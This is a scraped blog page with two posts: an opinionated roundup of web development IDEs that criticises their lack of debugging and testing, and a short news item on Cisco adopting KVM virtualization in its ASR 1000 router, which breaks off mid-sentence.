        The arena of web 2.0 IDEs is full of competitors. Mind you, I will only name a few but feel free to drop me a comment if you know some more. I will do a little mixing between Ajax/Client oriented IDEs and IDES supporting server side languages, but that's exaclty the point: in the new Web 2.0 we need to use both! What's more, most IDEs are not just being, well, IDEs, but they're supporting their own framework with proprietary libraries, different standards and so on.

        • Aptana is one of the best IDEs around, featuring an Ajax powered web server and supporting AIR too ( AIR vs Silverlight anyone?).Aptana is targeting PHP and ROR, two of the most popular languages in the internet, but... surprise, no support for PHP debugging, only Javascript. So even with the advanced Aptana you're cast to the stone age of echo $debug

        • Echo2 is a framework/ide aimed at Ajax and Rich Client development. It's obviously java based, and provides a nice and easy environment for the developer. I can't help but feel a "blackbox" look around echo-based applications.

        • qooxdoo is a complete framework for Ajax: it does not require any knowledge of html, css or whatever, being a huge juggernaut with its own libraries and a development environmente completely masquerading the underlying structure. Server side, it supports PHP, Perl and Java. Did I mention there's no debugging?

        • Morfik WebOS AppsBuilder is a another complete framework for ajax, featuring a visual environment for page building and browser side debugging via FireBug. And when I say complete I mean it: Morfik is a complete RAD tool, so you are either going to love it or hate it.

        • Eclipse PDT project is an Eclipse plugin powering the development of PHP code. It's still not very mature, but will eventually support complete debugging (it does, actually, by now, but it's a little tricky to setup) and it's my IDE of choice, by the way.

        • RDT is a complete Eclipse plugin for Ruby On Rails development.Nothing to say here, it's probably the IDE of choice of most Ruby developers.

        • Zend Studio should be a bigger player. It's Eclipse based now, supporting unit testing (finally!) and proper debugging. But yet, its relatively high price is a huge stop for buyers: most PHP guys nowaday were coding alone yesterday and could not afford Studio. The result is that they don't need it now, and they probably won't tomorrow. Bad move, Zend.

        • Netbeans has a surprisingly good support for Ruby on Rails, including debugging, semantic analysis and so on.

        • 4D's ajax support is a nice addition to the 4D suite. I must admit I never quite got to know 4D, being it a little too "closed minded" for me, so I'm just mentioning it here.


        But wait: how comes we are speaking about web 2.0 IDEs and we are not mentioning any IDE that is actually 2.0? Well, here you are:
        • Heroku is a feature-full, powerful and scalable ide for developing Ruby on Rails applications directly on the web. Heroku will take care of everything from giving you an IDE to actually running the applications in production. That's a tremendous improvement, but yet... you will be missing the most advanced features of a fulle IDE (debugging, call tracking and so on).

        • AppJet is a full-javascript solution: write your javascript code in their IDE and voila, it's up and running server side-.


        Conclusions: while we have dozens of players and softwares, not only we're missing the ultimate IDE, but most environments don't support even the most fundamental features that programmers have became accustomed to.
        Debugging, proper testing and continuos integration are nowhere to be found in the brave new web.
        The next time your favourite web application goes mad, you know why.

        Update: after a quick test, I've added 4D and Netbeans. Thanks go to freakface and Mickael (even if he is now using gedit).
        22:51

        Cisco and KVM

        Virtualization.info published yesterday a breaking news: Cisco will use KVM on its brand new ASR 1000 router.
        KVM is a virtualization technology included in modern Linux kernels: it is the virtualization platform supported by Ubuntu and ready to replace XEN in most opensource environments as soon as it reach enough stability and usability (and possibly an user interface).
        The ASR 1000 is Cisco's highest end router, costing around 35k US$, and it's the first Cisco router using Linux instead of the proprietary IOS. The ASR 1000 will leverage on KVM to provide operating system redundancy without any dedicated hardware.
        While Cisco has invested in VMware in the past, and they are collaborating on the VFrame technology, the message is clear: there's no space in embedded, low fingerprinting virtualization for VMware anymore. The possibility to fine tune the operating system to its maximum and the source code availability of KVM offer unmatched advantages in such challenging high performances environments as routers and embedded devices.
        We can easily expect to see more and more virtualization embedded in appliances and hardware devices: what about an antivirus box able to trace the stack of malwares running them in a virtual box, instead of the
        Older posts are this way If this message doesn't go away, click anywhere on the page to continue loading posts.
        Could not load more posts
        Maybe Soup is currently being updated? I'll try again automatically in a few seconds...
        Just a second, loading more posts...
        You've reached the end.